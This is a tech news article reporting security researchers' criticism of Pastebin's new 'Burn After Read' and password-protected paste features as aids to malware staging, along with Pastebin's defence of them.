Pastebin, the most popular website where users can share small snippets of text, has added two new features today that cyber-security researchers believe are going to be widely and wildly abused by malware operators.
Named “Burn After Read” and “Password Protected Pastes,” the two new features allow Pastebin users to create pastes (pieces of text) that expire after a single read or pastes that are protected by a password.
None of the two features are original, as they have been present on many paste sites for years.
However, they are new to Pastebin, which is, by far, today’s most popular pastes portal, being ranked in the Alexa Top 2,000 most popular sites on the internet.
Pastebin has been abused in malware operations
As with anything popular, this has also attracted a lot of bad content that’s has been hosted on the platform. While some people use it to host pieces of code or text they wanted to share with a colleague, over the past decade, Pastebin has also turned into a de-facto hosting service for malicious code.
Across the years, malware authors have used Pastebin to store malicious commands that they retrieve and run on infected hosts, hacked data, IP addresses for malware command and control servers, and many other operational details.
Ted Samuels, an incident response (IR) consultant, told ZDNet today that it’s hard to put a number or percentage on Pastebin’s presence in malware operations, but described it as “not uncommon.”
“Pastebin is by far the most prolific ‘paste site’ and fairly popular staging ground for fileless attacks using PowerShell. For example, a threat actor’s initial payload may use PowerShell to download additional (and often obfuscated) content from pastebin.com for further execution via PowerShell. The prolific CobaltStrike framework can be loaded this way.”
To counteract Pastebin’s rising popularity among malware devs, throughout the years, cyber-security companies have created tools that scrape new Pastebin entries to search for malicious or sensitive-looking content as soon as it’s uploaded on the site. These malicious pastes are indexed in private threat intel databases that are later used for incident response, and are also reported to Pastebin to have them taken down.
But now, security researchers argue that by adding the two new features today, Pastebin is blocking their good-will efforts to detect malware operations and is catering more to the malware crowd rather than actual users and the good guys.
“Unless they’re taking measures that aren’t immediately apparent to prevent the use of Burn After Reading and Password Protection for C2 and malware staging, those would seem to be pretty helpful new features for attackers who use PasteBin for those ends,” Brian, a security researcher from Pittsburgh, told ZDNet.
But the new features go beyond just detecting what was uploaded on the site in real-time. It also impacts post-infection IR investigations.
“This new change will now make it harder for incident responders to quickly evaluate what may have been downloaded and executed in some environments,” Samuels told ZDNet.
Long-time bad blood
But the acidic reaction towards Pastebin’s two new features today is also because of the cyber-security community’s rocky relationship with the site.
Across the years, security researchers have often accused its admins of dragging their feet when needing to take down malicious pastes. Things got very heated earlier this year in April when Pastebin wanted to discontinue the Scraping API; a tool cyber-security researchers were using to detect new content being uploaded on Pastebin.
Pastebin backtracked on the change after massive backlash and media coverage.
It is unclear what Pastebin thinks of the cyber-security community’s latest reaction to its newest features, but in an email, the company said it added “Burn After Read” and “Password Protected Pastes” at the request of its users
“Pastebin stores important data for our users starting from calculations and engineering data, such as algorithms, logs from various services, robots, network devices and ending with proprietary software code,” the company said.
“We have received many requests from our users to implement these features because of their privacy rights, and to help our users protect their work.”
“Pastebin was created by developers for developers, and is used globally by millions. Of course, every platform has bad actors that try to take advantage, including Github, Twitter, Facebook, Dropbox, Privnotes & Sendspace to name a few,” Pastebin said.
As Pastebin pointed out, cyber-security researchers may also be overreacting, as there are dozens of other paste sites like Pastebin around, some of which are even more lenient towards allowing abuse on their platforms when compared to Pastebin.
“Of course there is some overreaction from infosec Twitter, and it’s not just Pastebin. There are many paste sites with similar functionality, postb.in for example,” Samuels said.
Keeping sites like Pastebin accountable for the features they support is necessary, but the two new features also have legitimate uses. If Pastebin is truly so bad, then other actions should have been taken years ago.
“Pastebin and others paste websites should be blocked inside company networks,” SwitHak, a security researcher from France, told ZDNet.
“We know that it is used by bad guys. We need to act in consequence.
“We know the vector, let’s burn it and force attackers to use their own servers. If they host the malware configuration on their own servers, we can burn the attackers’ infrastructure. It’s about making the attack more complicated for the attackers, forcing them to play in our field and imposing cost,” SwitHak added.
However, Pastebin says that while the two new features might be abused, the company also has features to help the good guys.
- Earlier this year, we introduced the new Enterprise API subscription to provide better data subscription for our business customers.
- Partnered with global cyber security companies for the protection of our site as well as enriching the data of their products and services.
- Partnered with global CERTs (Computer Incident Response Center Luxembourg, Canadian Centre for Cyber Security, Austrian Energy CERT) and law enforcement agencies.
- Internally, as it relates to malicious content, in partnership with the organizations mentioned above, we take proper actions in mitigating these data.
- For researchers, academia and industry organizations approved by us, we grant this access at no cost.
- Lastly, implementation of Abuse Management and Threat Analysis teams who work closely with law enforcement and industry partners.
Updated with comments from Pastebin, as they arrived post publication.